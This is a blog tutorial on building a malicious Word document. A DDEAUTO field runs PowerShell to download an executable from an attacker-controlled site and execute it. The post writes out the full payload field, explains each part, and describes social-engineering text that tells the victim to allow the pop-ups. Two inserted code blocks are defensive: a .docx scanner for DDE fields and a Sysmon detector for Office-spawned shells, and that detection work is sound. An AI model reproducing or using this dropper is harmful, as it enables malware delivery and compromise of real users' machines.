Creating a Cyber Attack – Part 9 (Making a malicious Word document using DDE and Powershell)

In part one of this series we looked at making a malicious Word document using DDE, which connected to our malicious site and automatically ran malicious code to give us access to the victim, with a fallback where the user is also prompted to install a secure file viewer should our automatic code not run. This gave us two chances to infect the victim machine.

This updated version will show how we can use DDE and PowerShell to download and run a malicious exe from a Word document. We can create a document which, when opened, automatically prompts the user to click a pop-up and then connects to our malicious website to download and run malware.

If you are a defender the most important thing to understand is how attacks like this work so you know what you are looking out for. With that in mind, let’s go make some Malware.

If you have not read the previous blogs of this series then I recommend you do, as they show how to create the malicious exe and configure the malicious website. This blog only covers the code in the document, so if there is any part you don’t understand, the other blogs explain each part in more detail. https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/

Here we start with the document already created and just needing the DDE code for the exploit; we’ve added some images and text to socially engineer the victim user into thinking it is legitimate and clicking the pop-up box. In this demo we will be using http://legitimate.website.com, which is just a private test site for this demo, so you will need your own website to host the malware.

We open up our prepared Word document.

The code we are going to insert is below:

DDEAUTO c:\windows\system32\cmd.exe "/k powershell.exe
Invoke-WebRequest -Uri 'http://legitimate.website.com/secure/secure.exe'
-OutFile 'C:\Users\bradley.cain.testadmin-PC\Downloads\secure.exe'
;powershell.exe Start-Sleep -seconds 10;powershell.exe .\secure.exe"

  • DDEAUTO c:\windows\system32\cmd.exe "/k powershell.exe – This is where the DDE field first launches a command prompt, which then launches PowerShell.
  • Invoke-WebRequest -Uri 'http://legitimate.website.com/secure/secure.exe' – This tells PowerShell to connect to our website and get our malicious file.
  • -OutFile 'C:\Users\bradley.cain.testadmin-PC\Downloads\secure.exe' – This tells PowerShell where to save the file.
  • ;powershell.exe Start-Sleep -seconds 10;powershell.exe .\secure.exe" – This tells PowerShell to wait 10 seconds before starting our malicious file, which ensures that the download has completed before trying to start the exe.
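A defender's first question is how to find a field like this before anyone opens the file. The scanner below is an added example written for this post, not the blog's own code: it unzips a .docx, joins the instrText runs that make up each field instruction (Word frequently splits a long field across several runs), and reports any instruction that begins a DDE or DDEAUTO conversation in the body, headers, footers or footnotes. The documents it scans are constructed in the script itself, with the PowerShell part of the field replaced by a placeholder.

```python
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# A field instruction that starts a Dynamic Data Exchange conversation, in either spelling.
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(xml_bytes: bytes) -> list[str]:
    """Return every complete field instruction in one WordprocessingML part.

    A complex field is stored as a run sequence: fldChar(begin), one or more
    instrText runs, then fldChar(separate) and fldChar(end). A simple field
    keeps its instruction in fldSimple/@w:instr. Both forms are collected.
    """
    root = ET.fromstring(xml_bytes)
    found: list[str] = []
    depth = 0                 # nesting level of complex fields
    parts: list[str] = []     # instrText pieces of the field being read
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end":
                depth -= 1
                if depth == 0 and parts:
                    found.append("".join(parts).strip())
                    parts = []
        elif el.tag == W + "instrText" and depth > 0:
            parts.append(el.text or "")
        elif el.tag == W + "fldSimple":
            found.append((el.get(W + "instr") or "").strip())
    return found


def scan_docx(data: bytes) -> list[tuple[str, str]]:
    """Return (part name, instruction) for each DDE/DDEAUTO field in a .docx.

    Every XML part under word/ is checked, so a field placed in a header,
    footer or footnote is found as well as one in the main body.
    """
    hits: list[tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                instructions = field_instructions(zf.read(name))
            except ET.ParseError:
                continue
            hits.extend((name, i) for i in instructions if DDE_RE.search(i))
    return hits


# --- constructed sample documents, not files from the post ---

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.'
    'openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
)

# Shape of the post's field, with the PowerShell part replaced by a placeholder.
SAMPLE_DDE_FIELD = r'DDEAUTO c:\windows\system32\cmd.exe "/k powershell.exe PAYLOAD_ELIDED"'


def build_sample_docx(instruction: str) -> bytes:
    """Minimal .docx whose body holds one complex field carrying `instruction`.

    The instruction is split across two instrText runs on purpose, as Word
    does for longer fields, so the scanner's run-joining is exercised.
    """
    half = len(instruction) // 2
    document = (
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{escape(instruction[:half])}</w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{escape(instruction[half:])}</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    print("DDE document :", scan_docx(build_sample_docx(SAMPLE_DDE_FIELD)))
    print("PAGE document:", scan_docx(build_sample_docx("PAGE")))
```

Point `scan_docx` at the bytes of any real .docx to check it. It only understands the OOXML (.docx) container; a legacy binary .doc carries the same field in a different format and needs a separate parser, so treat a clean result on a .doc as no result rather than a pass.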

Move the cursor down the page so the code will not be visible when the document is opened, then click “Insert” on the ribbon, then “Quick Parts”, then “Field” from the drop-down menu. Ensure “=(Formula)” is selected, then click OK.

[Screenshot: DDEDoc2.png]
[Screenshot: DDEDoc3-1024x603.png]

Then you should see the below in your document. This is our formula field.

[Screenshot: DDEDoc4.png]

Right-click and choose “Toggle Field Code”.

[Screenshot: DDEDoc5.png]

Then you’ll see this:

[Screenshot: DDEDoc6-1.png]

Let’s paste in our code.

We start our listener on our attacker’s device.

Our victim opens the document and gets our pop-up messages; the guide text in the document behind them tells the user these are expected and to allow them. It’s an “Assured secure document” after all. 😉

That’s it: our program downloads and runs in the background without the user being aware, and the attacking machine gets its connection.

Finally, to show we have a connection and are able to run commands, we pop Calculator on the desktop (obviously you would not do this as a real-life attacker; it is shown here to prove we can execute commands on the victim machine).

Hope you enjoyed learning what is possible with the DDEAUTO function. This is a basic demo; we will come back and show an example of obfuscated PowerShell commands as a more real-world example. If you are interested in learning how to spot this type of attack then take a look at our blog series on detecting cyber attacks. https://blog.2code-monte.co.uk/2021/02/26/detecting-a-cyber-attack-part-1-sysmon-endpoint-install/
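Since the post ends by pointing at Sysmon for detection, here is the process-tree check that catches the execution chain described above (Word launching cmd.exe, which launches PowerShell). It is an added example, not code from the blog or its detection series: it walks Sysmon Event ID 1 process-creation records, flags any cmd.exe or powershell.exe with an Office application in its ancestry, and marks the ones whose command line carries the Invoke-WebRequest download used by the payload. It goes slightly beyond the post by treating Excel as an Office parent too, since DDE fields work there as well. The event records are constructed for the example and reduced to the fields the check needs.

```python
from __future__ import annotations

import ntpath
import re

# Office hosts that have no business spawning a shell; names are compared lower-cased.
OFFICE_IMAGES = {"winword.exe", "excel.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}
# The download cmdlet used by the post's payload, plus its built-in alias.
DOWNLOAD_RE = re.compile(r"\b(Invoke-WebRequest|iwr)\b", re.IGNORECASE)

# Constructed Sysmon Event ID 1 records (not real logs). Real logs should be
# keyed on ProcessGuid rather than ProcessId, because PIDs are reused.
SAMPLE_EVENTS = [
    {"ProcessId": 2000, "ParentProcessId": 1000,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\Assured Secure Document.docx"'},
    {"ProcessId": 3000, "ParentProcessId": 2000,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"c:\windows\system32\cmd.exe /k powershell.exe Invoke-WebRequest "
                    r"-Uri http://legitimate.website.com/secure/secure.exe -OutFile secure.exe"},
    {"ProcessId": 4000, "ParentProcessId": 3000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest -Uri http://legitimate.website.com/secure/secure.exe -OutFile secure.exe"},
    {"ProcessId": 4100, "ParentProcessId": 3000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Start-Sleep -seconds 10"},
    # Benign: an administrator opens a shell from the desktop.
    {"ProcessId": 5000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    # Benign: Word's print helper is a child of Word but not a shell.
    {"ProcessId": 6000, "ParentProcessId": 2000,
     "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def ancestry(event: dict, by_pid: dict[int, dict], max_depth: int = 5) -> list[str]:
    """Image names from this process up through its parents, nearest first.

    ParentImage is used for each hop so the chain extends one step past the
    oldest parent that has its own creation record.
    """
    chain = [_name(event["Image"])]
    cur = event
    for _ in range(max_depth):
        chain.append(_name(cur["ParentImage"]))
        cur = by_pid.get(cur["ParentProcessId"])
        if cur is None:
            break
    return chain


def detect_office_shell(events: list[dict]) -> list[dict]:
    """Flag cmd/powershell processes that have an Office application as an ancestor."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        if _name(e["Image"]) not in SHELL_IMAGES:
            continue
        chain = ancestry(e, by_pid)
        if not any(name in OFFICE_IMAGES for name in chain[1:]):
            continue
        alerts.append({
            "pid": e["ProcessId"],
            "chain": " -> ".join(reversed(chain)),
            "downloader": bool(DOWNLOAD_RE.search(e["CommandLine"])),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_office_shell(SAMPLE_EVENTS):
        print(alert)
```

The ancestry walk matters here: the powershell.exe processes are grandchildren of Word, so a rule that only compares ParentImage would miss them and see only the cmd.exe hop. Keying on ProcessGuid instead of ProcessId is the one change needed before running this over real Sysmon output.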